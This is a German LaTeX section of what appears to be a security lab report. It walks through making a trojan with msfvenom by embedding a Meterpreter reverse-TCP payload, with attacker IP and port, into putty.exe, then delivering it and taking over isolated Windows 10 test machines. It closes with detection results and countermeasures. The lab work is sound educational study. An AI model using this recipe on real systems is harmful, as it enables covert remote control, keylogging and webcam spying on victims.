\section{Praktische Durchführung}\label{sec:praktischeDurchfuehrung}
Im folgenden Kapitel wird das bereits vorgestelle Metasploit-Framework genutzt
um einen beispielhaften Trojaner zu erstellen.

\subsection{Aufbau}\label{sec:praktischeDurchfuehrung-aufbau}
Für einen möglichst einfachen und gleichzeitig verhältnismäßig sicheren Ablauf
wird das Labor in einer virtualisierten Umgebung ohne Verbindung zum Internet durchgeführt.
Beispielsweise VirtualBox bietet hierfür eine \enquote{Internal Networking} Einstellung, unter welcher lediglich die virtuellen Maschinen untereinander kommunizieren können.

\begin{figure}[ht!]
	\centering
	\begin{tikzpicture}[,>={Stealth[round]},shorten >=1pt,auto,semithick]
		\tikzstyle{pc}=[rectangle,draw=black,minimum size=30pt,inner sep=5pt,align=center]

		\node[pc] (A) at (1,2)  {\underline{Angreifer} \\ (Kali Linux, Metasploit)};
		\node[pc] (V1) at (5,4)  {\underline{Opfer 1}\\(Windows 10, Veraltet)};
		\node[pc] (V2) at (5,2)  {\underline{Opfer 2}\\(Windows 10, Avira)};
		\node[pc] (V3) at (5,0)  {\underline{Opfer 3}\\(Windows 10, Aktuell)};

		\path (A) edge (V1) ;
		\path (A) edge (V2) ;
		\path (A) edge (V3) ;

	\end{tikzpicture}
	\caption{Übersicht} \label{fig:uebersicht}
\end{figure}

An der praktischen Durchführung sind, wie in Abbildung \ref{fig:uebersicht} dargestellt, vier Computer beteiligt.
Auf dem Angreifer läuft das Betriebssystem \textit{Kali Linux}, welches bereits das Metasploit-Framework enthält.
Außerdem wird der späteren Trojaner über einen Apache Webserver an das Opfer zu übergeben.
Die Opfer nutzen das weit verbreitete Betriebssystem Windows 10. Mit folgenden Unterschieden:

\begin{description}
	\item[Opfer 1]Veraltete Version von Windows 10 (Stand: 27.04.2018)
	\item[Opfer 2]Veraltete Version von Windows 10, allerdings mit Avira Free Security Suite (Version 15.0.36.163)
	\item[Opfer 3]Aktualisierte Version von Windows 10 (Stand: 04.05.2018)
\end{description}

\subsection{Ablauf}\label{sec:praktischeDurchfuehrung-ablauf}
\begin{figure}[ht!]
	\centering
	\begin{sequencediagram}
		\newthread{a}{Angreifer}
		\tikzstyle{inststyle}+=[rounded corners=3mm]
		\newinst{l}{Listener}
		\newinst{t}{Trojaner}
		\tikzstyle{inststyle}+=[rounded corners=false]
		\newthread{v}{Opfer}
		\begin{messcall}{a}{ Erstellen des Trojaners }{t}
		\end{messcall}
		\begin{messcall}{a}{ Aktivieren des Listeners }{l}	
			\begin{call}{a}{ Bereitstellen des Trojaners }{a}{}
				\begin{call}{v}{ Abrufen des Trojaners }{a}{Trojaner}
				\end{call}
				\begin{messcall}{v}{ Ausführen des Trojaners }{t}
					\begin{call}{t}{ Aufbauen der Verbindung }{l}{}
						\mess{l}{Information über Verbindungsaufbau}{a}
					\end{call}
					\begin{call}{a}{ Eingabe von Befehlen }{l}{}
						\begin{call}{l}{ Senden von Befehlen }{t}{}
							\begin{call}{t}{ Audführen von Befehlen }{v}{}
							\end{call}
						\end{call}
					\end{call}
				\end{messcall}
			\end{call}	
		\end{messcall}
	\end{sequencediagram}
	\caption{Ablauf} \label{fig:Ablauf}
\end{figure}

\textbf{1. Erstellen des Trojaners: }
Zunächst wird auf dem System des Angreifers der Trojaner erstellt.
Ziel ist es den Payload \code{windows/meterpreter/reverse\_tcp} in ein normales Programm (hier das bekannte \code{putty.exe}) einzuschleusen. 
Dies geschieht mit dem Befehl \code{msfvenom} \cite{OSMSFV}, wobei folgende Parameter gesetzt werden:
\begin{itemize}
	\item \textbf{Payload}: \\
		  \code{-p windows/meterpreter/reverse\_tcp}
	      \begin{itemize}
		      \item  \textbf{Angreifer-IP}: \code{lhost=192.168.100.101}
		      \item \textbf{Angreifer-Port}: \code{lport=6666}
		  \end{itemize}
	\item \textbf{Architektur}: \code{-a x86}
	\item \textbf{Plattform}: \code{---platform windows}
	\item \textbf{Dateiformat}: \code{-f exe}
	\item \textbf{Vorlage}: \code{-x putty.exe}
	\item \textbf{Vorlage innerhalb des Trojaners ausführen}: \code{-k}
	\item \textbf{Ausgabe (Trojaner)}: \code{-o puttyX.exe}
\end{itemize}

\bigskip
\textbf{2. Aktivieren des Listeners: } 
Zur Aktivierung des Listeners wird die grafische Oberfläche Armitage verwendet.
Der Listener wird über \code{exploit/multi/handler} gestartet.
Hierfür muss dieser mit dem Payload (inkl. IP-Adresse und Port) aus Schritt 1 konfiguriert werden.

\bigskip
\textbf{3. Verbreiten und Ausführen des Trojaners: }
Der erstellte Trojaner wird in das Wurzelverzeichnis des Webservers \code{/var/www/html} kopiert um diesen einfach, und gleichzeitig verhältnismäßig realitätsnah an die Opfer zu übermitteln.
In der Praxis könnte zum verbreiten des Trojaners zum Beispiel DNS-Spoofing verwendet werden, um dem Opfer den Trojaner statt dem eigentlichen Programm zu übergeben.
Führt das Opfer das Programm mit dem Trojaner aus, so baut dieser eine Verbindung zum Angreifer auf. 

\bigskip
\textbf{4. Attackieren des Opfer-Systems: }
Der Angreifer kann nun mithilfe von Armitage und Meterpreter Zugriff auf diverse Systemfunktionalität wie Beispielsweise:
\begin{description}
	\item[Interaktion (interaction)]
		\begin{itemize}
			\item[]  
			\item Shell/Kommandozeile öffnen und verwenden
			\item VNC-Verbindung aufbauen
		\end{itemize}
	\item[Zugriff (access)]
		\begin{itemize}
			\item[]
			\item Privilegien ausweiten
			\item Trojaner persistieren
		\end{itemize}
	\item[Entdecken (explore)]  
		\begin{itemize}
			\item[]  
			\item Dateienverzeichnis anzeigen
			\item Prozesse anzeigen
			\item Keylogger aktivieren
			\item Screenshots
			\item Webcamaufnahmen 
		\end{itemize}
\end{description}

\subsection{Funktionsweise des Trojaners}\label{sec:praktischeDurchfuehrung-funktionsweise}
Der Trojaner kombiniert die Arten Backdoor und Linker indem er den Schadcode \textit{Meterpreter} 
in dem Programm \textit{putty} versteckt.
Beim Ausführen stellt dieser eine Verbindung vom Zielsystem zum Angreifer her.

Hierbei wird einerseits ausgenutzt, dass das Betriebssystem bzw. die Antivirus-Software nicht ausreichend aktualisiert wurde.
Andererseits könnte der Angriff durch wählen einer sicheren Download-Quelle (z.B. mittels https)
oder einem Vergleich der Prüfsumme mit einer vertrauenswürdigen Quelle verhindert werden.

\subsection{Ergebnisse}\label{sec:praktischeDurchfuehrung-ergebnisse}

Der Baukasten ist leicht zu Bedienen und durch ergiebige Dokumentation ist kein Fachwissen notwendig.
Außerdem bietet er dank dem modularen Aufbau zahlreiche Möglichkeiten um Trojaner oder andere Schadsoftware für verschiedene Systeme zu erzeugen.

Die Trojaner ist sehr einfach zu Erzeugen und Anzuwenden. 
Dieser Trojaner ist jedoch durch einfache Schutzmechanismen bereits zu erkennen.
Im Versuch zeigte sich, dass sowohl die aktualisierte Windows-Version sowie der Avira-Schutz den Trojaner rechtzeitig erkennen konnten.
Lediglich die veraltete Windows-Version konnte den Trojaner nicht erkennen. 

Zwar richtet der Trojaner selbst keinen direkten Schaden an, eröffnet jedoch Möglichkeiten für weitere Angriffe.
